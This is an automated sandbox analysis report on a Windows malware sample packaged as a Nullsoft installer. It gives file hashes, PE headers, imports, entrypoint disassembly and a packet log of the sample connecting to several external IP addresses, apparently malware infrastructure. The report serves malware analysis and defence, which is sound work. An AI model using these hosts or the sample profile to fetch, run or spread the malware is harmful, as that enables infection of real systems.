                                                                      SSDEEP:12:8wl0hsXyllEzKi+qA6cCl4hIOKz7Fzl4hIO7j7Q1LgXNE7/v4t2YZ/elFlSJm:8y2CzKt6cm7OkJ7O7Q5ye/lqy
                                                                      MD5:26E0603817CFFA30B5A0884C823B7BC8
                                                                      SHA1:1B89699F708C9FDC29089044CE0D01068DC3A9C2
                                                                      SHA-256:D021F88E3B87F6D7A5D971F4758A75BDEDC113E172E3B5406C11CF6243DDA433
                                                                      SHA-512:8638979543F0B4004A206450E1B147A9B38D4C2CFBCD27ACDC70BDA1810C07D3064B4AA29B1C52197572E809DC4105392C283FD17E3ADCD17D411B5DCEC23696
                                                                      Malicious:false
                                                                      Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k.....P.1...........Music.<............................................M.u.s.i.c.....~.2...........forbindingers.Bam132..Z............................................f.o.r.b.i.n.d.i.n.g.e.r.s...B.a.m.1.3.2...$...+.....\.....\.U.s.e.r.s.\.b.r.o.k.\.M.u.s.i.c.\.f.o.r.b.i.n.d.i.n.g.e.r.s...B.a.m.1.3.2.5.C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.o.v.i.e.d.o.m.2.3.0.\.G.r.n.n.e.n.d.e.........................q..K.m.H..B" ..C................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Entropy (8bit):7.466005196525454
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      File size:562'306 bytes
                                                                      MD5:4621fea50e1982e6f753efe7d1be2b35
                                                                      SHA1:46072b07bfa96583ed03149a04411cbcf04eadf9
                                                                      SHA256:6b2874507fc8b7782d11f202840850ba6edd8befbb8c163c4d53775fb8d20603
                                                                      SHA512:301e380d9e207caa7e994b251e2018207851a32f0c1850b3de669742c9d640d5254640d972e0143bc99e8cb2e3728bb7878814e66498928ff777d26c9bd206f5
                                                                      SSDEEP:12288:8stfWr2zXogHMSwOdJ1JUTrNuVwik2Mx/DvMAM++:8st+r2zXZ/dJyrNuuik2yDc++
                                                                      TLSH:17C4C0612277DC63E38483B44155EABD8E7BEE8A1931DA3716F4ED5BB518F32381A301
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...<.Oa.................f...|.......3............@

                                                                      File Icon

                                                                      Icon Hash:7b33527236162635

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x4033b3
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x614F9B3C [Sat Sep 25 21:57:16 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:5f0c714c36e6cc016b3a1f4bc86559e4

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      sub esp, 00000220h
                                                                      push esi
                                                                      push edi
                                                                      xor edi, edi
                                                                      push 00008001h
                                                                      mov dword ptr [ebp-10h], edi
                                                                      mov dword ptr [ebp-04h], 0040A198h
                                                                      mov dword ptr [ebp-08h], edi
                                                                      mov byte ptr [ebp-0Ch], 00000020h
                                                                      call dword ptr [004080B8h]
                                                                      mov esi, dword ptr [004080BCh]
                                                                      lea eax, dword ptr [ebp-000000C0h]
                                                                      push eax
                                                                      mov dword ptr [ebp-000000ACh], edi
                                                                      mov dword ptr [ebp-2Ch], edi
                                                                      mov dword ptr [ebp-28h], edi
                                                                      mov dword ptr [ebp-000000C0h], 0000009Ch
                                                                      call esi
                                                                      test eax, eax
                                                                      jne 00007F9024EE4D11h
                                                                      lea eax, dword ptr [ebp-000000C0h]
                                                                      mov dword ptr [ebp-000000C0h], 00000094h
                                                                      push eax
                                                                      call esi
                                                                      cmp dword ptr [ebp-000000B0h], 02h
                                                                      jne 00007F9024EE4CFCh
                                                                      movsx cx, byte ptr [ebp-0000009Fh]
                                                                      mov al, byte ptr [ebp-000000ACh]
                                                                      sub ecx, 30h
                                                                      sub al, 53h
                                                                      mov byte ptr [ebp-26h], 00000004h
                                                                      neg al
                                                                      sbb eax, eax
                                                                      not eax
                                                                      and eax, ecx
                                                                      mov word ptr [ebp-2Ch], ax
                                                                      cmp dword ptr [ebp-000000B0h], 02h
                                                                      jnc 00007F9024EE4CF4h
                                                                      and byte ptr [ebp-26h], 00000000h
                                                                      cmp byte ptr [ebp-000000ABh], 00000041h
                                                                      jl 00007F9024EE4CE3h
                                                                      movsx ax, byte ptr [ebp-000000ABh]
                                                                      sub eax, 40h
                                                                      mov word ptr [ebp-2Ch], ax
                                                                      jmp 00007F9024EE4CD6h
                                                                      mov word ptr [ebp-2Ch], di
                                                                      cmp dword ptr [ebp-000000BCh], 0Ah
                                                                      jnc 00007F9024EE4CDAh
                                                                      and word ptr [ebp+00000000h], 0000h

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3e0000x304b8.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x65ba0x66006e968f149f564f58d6d9c6be0d4d9835False0.677734375data6.4837786344312045IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x80000x13820x1400b482f3e369cbdfbb46b476304c2b23c4False0.4626953125data5.262676635269928IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0xa0000x255380x600c17387307d09c631d1913f4cbee5a09bFalse0.462890625data4.130139712023956IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .ndata0x300000xe0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0x3e0000x304b80x30600cecd40c9c56b9cb51a37ea4fc2667350False0.41400698481912146data5.781817826756975IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_ICON0x3e3880x10a00Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.265140390037594
                                                                      RT_ICON0x4ed880x9600Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3025260416666667
                                                                      RT_ICON0x583880x7600PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9919557733050848
                                                                      RT_ICON0x5f9880x5600Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.32262899709302323
                                                                      RT_ICON0x64f880x4400Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.35696231617647056
                                                                      RT_ICON0x693880x2600Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3853824013157895
                                                                      RT_ICON0x6b9880x1200Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4479166666666667
                                                                      RT_ICON0x6cb880xa00Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.51640625
                                                                      RT_ICON0x6d5880x600Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4479166666666667
                                                                      RT_DIALOG0x6db880x100dataEnglishUnited States0.5234375
                                                                      RT_DIALOG0x6dc880x11cdataEnglishUnited States0.6056338028169014
                                                                      RT_DIALOG0x6dda80xc4dataEnglishUnited States0.5918367346938775
                                                                      RT_DIALOG0x6de700x60dataEnglishUnited States0.7291666666666666
                                                                      RT_GROUP_ICON0x6ded00x84dataEnglishUnited States0.8939393939393939
                                                                      RT_VERSION0x6df580x21cdataEnglishUnited States0.524074074074074
                                                                      RT_MANIFEST0x6e1780x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                      Imports

                                                                      DLLImport
                                                                      ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                      SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                      ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                      USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, SetWindowPos, SetCursor, GetSysColor, SetClassLongA, GetWindowLongA, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersionExA, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States

                                                                      Network Behavior

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 25, 2024 19:25:24.386379957 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:24.386415958 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:24.386852026 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:24.399139881 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:24.399158955 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:24.877459049 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:24.877583981 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:24.938307047 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:24.938338995 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:24.938694000 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:24.938776970 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:24.941941023 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:24.984122992 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.589771032 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.589797974 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.589844942 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.589864016 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:25.589890003 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.589919090 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:25.589993000 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:25.590032101 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.590050936 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.590120077 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:25.590126991 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.590164900 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:25.825278044 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.825293064 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.825345993 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.825378895 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:25.825407982 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.825436115 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:25.825455904 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:25.825558901 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.825581074 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.825614929 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:25.825619936 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.825649023 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:25.825665951 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:25.826040983 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.826055050 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.826108932 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:25.826116085 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.826152086 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:25.855964899 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.855993032 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.856064081 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:25.856086016 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.856143951 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.060034990 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.060065985 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.060147047 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.060158968 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.060266018 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.060400009 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.060415030 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.060566902 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.060573101 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.060899973 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.060919046 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.060970068 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.060970068 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.060976982 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.061033964 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.061033964 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.061319113 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.061332941 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.061511993 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.061517954 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.061665058 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.061793089 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.061806917 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.062005997 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.062011003 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.062094927 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.090014935 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.090033054 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.090173960 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.090183020 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.090240955 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.298460960 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.298486948 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.298613071 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.298633099 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.298644066 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.298651934 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.298736095 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.298743010 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:26.298832893 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.299320936 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.299341917 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:49.463134050 CEST4970780192.168.2.10112.175.50.218
                                                                      Apr 25, 2024 19:25:49.746129036 CEST8049707112.175.50.218192.168.2.10
                                                                      Apr 25, 2024 19:25:49.746237040 CEST4970780192.168.2.10112.175.50.218
                                                                      Apr 25, 2024 19:25:49.748930931 CEST4970780192.168.2.10112.175.50.218
                                                                      Apr 25, 2024 19:25:50.032233000 CEST8049707112.175.50.218192.168.2.10
                                                                      Apr 25, 2024 19:25:50.050057888 CEST8049707112.175.50.218192.168.2.10
                                                                      Apr 25, 2024 19:25:50.050247908 CEST8049707112.175.50.218192.168.2.10
                                                                      Apr 25, 2024 19:25:50.050263882 CEST8049707112.175.50.218192.168.2.10
                                                                      Apr 25, 2024 19:25:50.050296068 CEST4970780192.168.2.10112.175.50.218
                                                                      Apr 25, 2024 19:25:50.050328970 CEST4970780192.168.2.10112.175.50.218
                                                                      Apr 25, 2024 19:25:50.055763006 CEST4970780192.168.2.10112.175.50.218
                                                                      Apr 25, 2024 19:25:50.338699102 CEST8049707112.175.50.218192.168.2.10
                                                                      Apr 25, 2024 19:26:05.334088087 CEST4970880192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:05.547240973 CEST8049708217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:05.547529936 CEST4970880192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:05.549998999 CEST4970880192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:05.763122082 CEST8049708217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:05.777693033 CEST8049708217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:05.777710915 CEST8049708217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:05.777761936 CEST4970880192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:07.055322886 CEST4970880192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:08.293977976 CEST4970980192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:08.508800030 CEST8049709217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:08.510369062 CEST4970980192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:08.512161970 CEST4970980192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:08.726849079 CEST8049709217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:08.732366085 CEST8049709217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:08.732383966 CEST8049709217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:08.732485056 CEST4970980192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:10.024216890 CEST4970980192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:11.043456078 CEST4971080192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:11.260081053 CEST8049710217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:11.260219097 CEST4971080192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:11.262888908 CEST4971080192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:11.479343891 CEST8049710217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:11.479363918 CEST8049710217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:11.491929054 CEST8049710217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:11.491976976 CEST8049710217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:11.492065907 CEST4971080192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:12.774044991 CEST4971080192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:13.792857885 CEST4971180192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:14.009279966 CEST8049711217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:14.009371996 CEST4971180192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:14.011388063 CEST4971180192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:14.227672100 CEST8049711217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:14.232901096 CEST8049711217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:14.233191967 CEST8049711217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:14.233263016 CEST4971180192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:14.235801935 CEST4971180192.168.2.10217.160.0.183
                                                                      Apr 25, 2024 19:26:14.452094078 CEST8049711217.160.0.183192.168.2.10
                                                                      Apr 25, 2024 19:26:20.100893021 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:20.371455908 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.371637106 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:20.373632908 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:20.642225981 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.681103945 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767047882 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767074108 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767086983 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767157078 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767194986 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767225027 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:20.767270088 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:20.767293930 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767318010 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767338991 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:20.767393112 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767436981 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:20.767798901 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767815113 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:20.767854929 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.037709951 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037729025 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037744045 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037789106 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037826061 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.037847996 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037864923 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037878990 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.037883043 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037900925 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037920952 CEST4971280192.168.2.10219.94.128.41
                                                                      Apr 25, 2024 19:26:21.037928104 CEST8049712219.94.128.41192.168.2.10
                                                                      Apr 25, 2024 19:26:21.037944078 CEST4971280192.168.2.10219.94.128.41
